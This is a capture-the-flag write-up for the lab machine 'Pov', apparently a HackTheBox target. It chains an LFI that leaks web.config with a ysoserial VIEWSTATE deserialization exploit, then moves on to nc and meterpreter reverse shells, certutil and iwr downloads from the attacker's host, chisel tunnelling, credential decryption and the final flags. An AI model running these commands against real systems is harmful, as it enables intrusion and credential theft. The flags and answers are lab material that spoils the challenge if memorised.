Nmap Results
# Nmap 7.94SVN scan initiated Tue Jan 30 16:24:53 2024 as: nmap -Pn -p- -sT --min-rate 5000 -A -oN nmap.txt 10.10.11.251
Nmap scan report for 10.10.11.251
Host is up (0.014s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: pov.htb
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 13.98 ms 10.10.14.1
2 14.12 ms 10.10.11.251
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 30 16:25:35 2024 -- 1 IP address (1 host up) scanned in 42.09 secondsService Enumeration
TCP/80
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: pov.htb
We can see that the default page on the target web server has a title of pov.htb. Let's add that to our /etc/hosts file.
echo '10.10.11.251 pov.htb' | sudo tee -a /etc/hosts
Gobuster Enumeration
Directories and Files
gobuster dir -u http://pov.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,aspx,php,txt -o gobuster-80.txt -t 100/Index.html (Status: 200) [Size: 12330]
/css (Status: 301) [Size: 142] [--> http://pov.htb/css/]
/img (Status: 301) [Size: 142] [--> http://pov.htb/img/]
/index.html (Status: 200) [Size: 12330]
/js (Status: 301) [Size: 141] [--> http://pov.htb/js/]Virtual Hosts
# --exclude-length 334 : silence HTTP 400
gobuster vhost -k --domain pov.htb --append-domain -u http://10.10.11.251 -w /usr/share/dnsrecon/subdomains-top1mil.txt -t 100 -o vhost.txt --exclude-length 334Found: dev.pov.htb Status: 302 [Size: 152] [--> http://dev.pov.htb/portfolio/]dev.pov.htb
echo '10.10.11.251 dev.pov.htb' | sudo tee -a /etc/hostsAdd this hostname to our hosts file
On the contact.aspx page, there appears to be a form that makes a HTTP POST request to itself. Not sure if this is exploitable yet.
More Directory and File Enumeration
# Ignore 302,404 responses
gobuster dir -u http://dev.pov.htb/portfolio -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,aspx,php,txt -o gobuster-80-dev.txt -t 100 -b 302,404/Contact.aspx (Status: 200) [Size: 4691]
/Default.aspx (Status: 200) [Size: 21371]
/assets (Status: 301) [Size: 159] [--> http://dev.pov.htb/portfolio/assets/]
/contact.aspx (Status: 200) [Size: 4691]
/default.aspx (Status: 200) [Size: 21371]
If we try and navigate to http://dev.pov.htb/portfolio/assets, you can see that the web server redirects us to http://dev.pov.htb:8080.
Testing the Download Function
Clicking the Download CV button invokes a __doPostBack JavaScript event of download and uses the file name cv.pdf by default.
I got really lucky with my guess that the cv.pdf file is stored at the root of the directory.
Download CV button is just pulling the cv.pdf file from this directory. Looking at my Burp request history, I notice there are other files we can test with in the /portfolio/ directory. It should be possible to download files by simply modifying the file= parameter in the POST request. 
Let's see if we can download any of the above files from the server. The procedure will go like this:
- Turn on Burp intercept
- Click the
Download CVbutton - Change the
cv.pdffilename todefault.aspx - Check and see if we got the page source code
Additional Download Tests
This is the last request for the file download I just sent in Burp. Right-click the request and choose Send to Repeater.
In the source code we downloaded above, we noted that the CodeFile=index.aspx.cs attribute where the default.aspx page runs its server-side code. Let's take a look at that file. In repeater, change &file=default.aspx to &file=index.aspx.cs and click Run.
Nice! We are able to read the C# code that will run server side when we load the page initially or interact with the Download even listener. There appears to be a bit of user input sanitization in the file= parameter as well, which wasn't a problem for us, as we used backslashes.
Let's take a look at contact.aspx and do the same thing. Load the page source, then load the server-side source.
Excellent! We can see the server-side code that will run when we load the page or submit information in the contact form.
Absolute paths also worked flawlessly without needing to do any special tricks. &file=C:\Windows\System32\drivers\etc\hosts.
As well as relative file path, where I was able to find the config file for the dev.pov.htb host — &file=..\web.config.
I even found that I can capture sfitz NetNTLMv2 hash by using impacket-smbserver and specifying &file=\\kali_vpn_ip\share_name\file_name.
I also tried creating reverse .aspx and web.config shells but had no luck getting a reverse shell when specifying &file=\\10.10.14.15\evil\file_name, even with other TCP ports specified.
Exploit
VIEWSTATE Deserialization with Secrets
I prodded the file system as much as I could with the LFI vulnerability, but came to a dead end. As any good security researcher would do, I took the information I'd gathered until now and searched Google for potential exploits, such as:
Response.TransmitFile()exploitabilityResponse.AppendHeader()exploitability
However, it was this search that ultimately opened the door to code execution:
The HackTricks page advises us to use the ysoserial.exe binary to generate a serialized VIEWSTATE command that will be de-serialized by the server. In this case, we know the encryption secrets, as we have access to the web.config file.
pwntesterysoserial tool to a Windows VM, your Windows host, or run it using Wine on Kali. I'm going to do it the Wine way, cause I like pain.Installing Wine Dependencies
sudo dpkg --add-architecture i386
sudo apt update
sudo apt install -y wine wine32:i386 winetricks mono-completeInstalling Wine-Mono
First, check the installed version of wine by running wine --version. In the screenshot below, you'll see I have version 8.0.1.
Next, we should consult the wine-mono version table here:
I am not at version 8.9 but my version is greater than 7.20, therefore, we should install wine-mono version 7.4.0.
wget https://dl.winehq.org/wine/wine-mono/7.4.0/wine-mono-7.4.0-x86.msi
wine uninstallerwine: could not load kernel32.dll, status c0000135, just run rm -rf ~/.wine/. Then, re-run wine uninstaller.
Install .NET Libraries
winetricks dotnet48
Generating the Serialized Payload
wget https://github.com/pwntester/ysoserial.net/releases/download/v1.36/ysoserial-1dba9c4416ba6e79b6b262b758fa75e2ee9008e9.zip -O ysoserial.zip
unzip -d ysoserial ysoserial.zip
cd ysoserial/ReleaseWe'll be referencing the example command here to generate the payload.
# LD_PRELOAD= : a command variable assignment to silence some errors on my host
# 2>/dev/null : Because wine was creating some weird error output that interfered with the payload
# sed s/\n//g' : Join on line breaks, not sure if wine is creating them
LD_PRELOAD= wine ./ysoserial.exe -p ViewState -g TextFormattingRunProperties \
-c "ping 10.10.14.15" \
--path="/portfolio/default.aspx" --apppath="/" \
--decryptionalg="AES" \
--decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" \
--validationalg="SHA1" \
--validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" 2>/dev/null | sed 's/\n//g'
Weaponizing the Payload
Go into your proxy settings and set to Intercept is on.
Click the Download CV button.
Note the request is intercepted and held by Burp. Highlight the VIEWSTATE parameter all the way up until the first & (ampersand).
Overwrite the contents of the VIEWSTATE parameter with your payload generated. Recall that the command I used in the example is ping 10.10.14.15, so I'm going to attempt to have the target ping my Kali VPN IP.
Go back into Burp and press the Forward button.
Note that I used tcpdump to listen for ICMP traffic on my tun0 interface and you can see the incoming ICMP echo request packets from 10.10.11.251 (the target's IP address).
Getting a Reverse Shell
Transfer nc.exe to the Target
cp /usr/share/windows-resources/binaries/nc.exe .
sudo python3 -m http.server 80Copy 'nc.exe' to the current directory and host it over HTTP
LD_PRELOAD= wine ./ysoserial.exe -p ViewState -g TextFormattingRunProperties \
-c "certutil.exe -urlcache -split -f http://10.10.14.15/nc.exe C:\Windows\Temp\nc.exe" \
--path="/portfolio/default.aspx" --apppath="/" \
--decryptionalg="AES" \
--decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" \
--validationalg="SHA1" \
--validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" 2>/dev/null | sed 's/\n//g'Generate the VIEWSTATE payload
Trigger a Reverse Shell
sudo rlwrap nc -lnvp 443Start a listener on your chosen TCP port
LD_PRELOAD= wine ./ysoserial.exe -p ViewState -g TextFormattingRunProperties \
-c "C:\Windows\Temp\nc.exe 10.10.14.15 443 -e powershell.exe" \
--path="/portfolio/default.aspx" --apppath="/" \
--decryptionalg="AES" \
--decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" \
--validationalg="SHA1" \
--validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" 2>/dev/null | sed 's/\n//g'Generate the VIEWSTATE payload
Post-Exploit Enumeration
Operating Environment
OS & Kernel
Host Name: POV
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA076
Original Install Date: 10/26/2023, 1:01:55 PM
System Boot Time: 2/2/2024, 6:46:50 PM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
[02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version: VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 3,296 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 4,029 MB
Virtual Memory: In Use: 770 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 10.10.11.251
[02]: fe80::4666:410:2b2c:7069
[03]: dead:beef::4d88:e9c:6f0c:4b61
[04]: dead:beef::a9
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Current User
USER INFORMATION
----------------
User Name SID
========= =============================================
pov\sfitz S-1-5-21-2506154456-4081221362-271687478-1000
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============================================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
IIS APPPOOL\dev Well-known group S-1-5-82-781516728-2844361489-696272565-2378874797-2530480757 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Users and Groups
Local Users
User accounts for \\POV
-------------------------------------------------------------------------------
Administrator alaading DefaultAccount
Guest sfitz WDAGUtilityAccount
The command completed successfully.
Local Groups
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Certificate Service DCOM Access
*Cryptographic Operators
*Device Owners
*Distributed COM Users
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Storage Replica Administrators
*System Managed Accounts Group
*Users
Network Configurations
Network Interfaces
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::a9
IPv6 Address. . . . . . . . . . . : dead:beef::4d88:e9c:6f0c:4b61
Link-local IPv6 Address . . . . . : fe80::4666:410:2b2c:7069%4
IPv4 Address. . . . . . . . . . . : 10.10.11.251
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:89e0%4
10.10.10.2
Open Ports
localaddress localport
------------ ---------
:: 49668
:: 49667
:: 49666
:: 49665
:: 49664
:: 47001
:: 5985
:: 445
:: 135
:: 80
0.0.0.0 49668
0.0.0.0 49667
0.0.0.0 49666
0.0.0.0 49665
0.0.0.0 49664
10.10.11.251 139
0.0.0.0 135
Interesting Files
C:\Users\sfitz\Documents\connection.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">alaading</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6</SS>
</Props>
</Obj>
</Objs>
Privilege Escalation
Lateral to Alaading
In the post-exploit enumeration section, we came across the C:\Users\sfitz\Documents\connection.xml file, which when inspected is a PowerShell PSCredential object stored in clixml format.
I'm already running a PowerShell reverse shell, so I should be able to import the credential object and reveal the plaintext password with ease.
$cred = Import-Clixml C:\Users\sfitz\Documents\connection.xml
$cred.GetNetworkCredential().Username
$cred.GetNetworkCredential().Password
You may also have noticed in the post-exploit enumeration that tcp/5985 is open in the listening ports. It is definitely behind Windows firewall, as it wasn't exposed in our initial nmap scan. We can use chisel to forward this port.
wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_windows_amd64.gz -O chisel.exe.gz
wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz -O chisel.gz
gunzip chisel.exe.gz
gunzip chisel.gz
chmod u+x chisel
sudo python3 -m http.server 80Download the binaries and host over HTTP
cd C:\Windows\Temp
iwr http://10.10.14.15/chisel.exe -o chisel.exeDownload to the target
sudo ./chisel server --port 8081 --reverse &Start chisel in server mode on Kali
$scriptBlock = { Start-Process C:\Windows\Temp\chisel.exe -ArgumentList @('client','10.10.14.15:8081','R:5985:127.0.0.1:5985') }
Start-Job -ScriptBlock $scriptBlockStart chisel in client mode as a background job on the target
evil-winrm -i 127.0.0.1 -u 'alaading' -p 'f8gQ8fynP44ek1m3'Connect to the target through the chisel tunnel
alaading, we repeat the post-exploit enumeration process.Alternative Lateral to Alaading
antonioCoco
- Transfer
RunasCs.exeto the target - Start a TCP listener
- Run the command to connect to the TCP listener with
alaadingcredentials
sudo rlwrap nc -lvnp 443Start the listener
.\RunasCs.exe 'alaading' 'f8gQ8fynP44ek1m3' 'powershell.exe' -r 10.10.14.15:443Spawn the process and redirect to the listener
Escalate to Administrator
SeDebugPrivilege given to this user account to achieve NT AUTHORITY/SYSTEM or Administrator without meterpreter. I was able to dump lsass using procdump, but the Administrator didn't have a cached session. Other techniques were also fruitless.Metasploit
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.15 LPORT=443 -f exe -o sh.exeCreate the meterpreter payload
sudo msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set LHOST tun0
msf6 exploit(multi/handler) > set LPORT 443
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > runStart MSF and use and configure the exploit handler
sudo python3 -m http.server 80Server the meterpreter payload over HTTP
iwr http://10.10.14.15/sh.exe -o sh.exe
.\sh.exeDownload and run the file
meterpreter > migrate -N lsass.exe
Flags
User
6554d872ca302f4e5c7c31ac06f8f638
Root
8f5b63e0cff832f141a776127bb09758
